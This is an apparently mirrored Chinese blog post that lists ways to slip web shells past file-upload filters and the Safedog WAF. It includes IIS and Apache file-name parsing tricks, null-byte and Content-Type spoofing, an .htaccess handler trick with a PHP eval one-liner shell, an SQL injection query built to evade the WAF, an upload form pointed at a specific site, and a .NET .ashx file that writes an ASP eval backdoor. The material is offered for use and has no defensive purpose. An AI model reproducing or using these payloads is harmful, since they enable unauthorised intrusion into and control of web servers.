zoukankan      html  css  js  c++  java
  • 突破各种安全软件 安全狗 继续渗透 上传

    抓包修改数据为:IIS忽略冒号后面格式 cs.asp:.jpg

    火狐FIREBUG修改本地JS

    upfile/upfile_other.asp upfile_photo.asp upfile_flash.asp

    asa cer asaspp

    隐藏表单,hidden修改数据,file

    00 1.asp;.jpg

    十六进制00: 1.asp

    双文件上传

    文件名大小写突破,对于LINUX等非WINDOWS系统

    asp空格

    asp.

    /xx.jpg%00.php

    cecerr aasasa

    Content-Type: image/gif (原为 Content-Type: text/plain)

    上传一个shtml文件, 内容为: <!--#include file="conn.asp"--> 直接查看源文件,找数据库,然后...

    apache的解析漏洞(上传1.php.hack,因为hack非法后缀,所以直接当作php执行了.

    文件名为www.xxx.com/1.asp;1.jpg。这样的会被IIS安全狗果断屏蔽。改成如下名称,IIS6一样会解析:www.xxx.com/;1.asp;1.jpg


    常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。但如果:seo.asp?seo.com=%00.&id=69%20 and 1=1

    利用.htaccess突破限制:

    1.首先上传.htaccess文件到某目录下,.htacess规则:

    <FilesMatch "hahahe">
    SetHandler application/x-httpd-php
    </FilesMatch>

    2.再上传一个文件,后缀任意写,内容:

    "hahahe"<?php @eval($_POST['dukong']);?>

    双文件上传突破:

    <form action="http://www.syxldwgy.com/upfile_Other.asp " method="post" name="form1" enctype="multipart/form-data">
    <input name="FileName1" type="FILE" class="tx1" size="20">
    <input name="FileName2" type="FILE" class="tx1" size="20">
    <input type="submit" name="Submit" value="上传">
    </form>
    View Code

    .ashx文件.NET 生成root.asp一句话马:

    <%@ WebHandler Language="C#" Class="Handler" %>
    
    using System;
    using System.Web;
    using System.IO;
    public class Handler : IHttpHandler {
        
        public void ProcessRequest (HttpContext context) {
            context.Response.ContentType = "text/plain";
            
            StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
            file1.Write("<%eval request("mima")%>");
            file1.Flush();
            file1.Close();
            
        }
    
        public bool IsReusable {
            get {
                return false;
            }
        }
    
    }
    View Code
  • 相关阅读:
    setTimeout 理解
    Git 使用规范流程
    JavaScript异步编程 ( 一 )
    javaScript模块化一
    javascript 知识点坑
    javaScript闭包
    函数式编程
    JavaScript的68个技巧一
    MySql 隐式转换
    MySQL优化
  • 原文地址:https://www.cnblogs.com/qunshu/p/3286593.html
Copyright © 2011-2022 走看看